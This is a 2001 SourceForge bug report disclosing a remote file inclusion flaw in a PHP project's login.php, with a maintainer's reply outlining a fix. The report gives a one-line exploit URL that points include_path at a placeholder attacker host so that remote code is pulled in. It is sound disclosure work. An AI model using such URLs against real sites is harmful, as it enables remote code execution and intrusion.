#7 serious security flaws

Alpha_Development
closed-later
9
2001-07-16
2001-07-12
Anonymous
No

e.g., login.php contains the following line:
include("$include_path/plugins/$plugin/function.php");

The $include_path can be set by anyone:
http://foo/login.php?mainfile=1&include_path=http://evilhost/

This exploit works on the demo site.

Discussion

  • Fred Hirsch

    Fred Hirsch - 2001-07-16

    Logged In: YES
    user_id=157247

    Thanks for finding this issue. I am working on this right
    now. It seems to be an artifact of using the old PHPNuke
    system of including the primary function library. Fix will
    be to use include_once and remove the mainfile variable. I
    will also explicitly unset any variables that are utilized
    globally in the primary methods.

     
  • Fred Hirsch

    Fred Hirsch - 2001-07-16
    • labels: --> Core Features
    • milestone: --> Alpha_Development
    • priority: 5 --> 9
    • assigned_to: nobody --> webmosher
    • status: open --> closed-later
     

Log in to post a comment.

Get latest updates about Open Source Projects, Conferences and News.

Sign up for the SourceForge newsletter:

JavaScript is required for this form.





No, thanks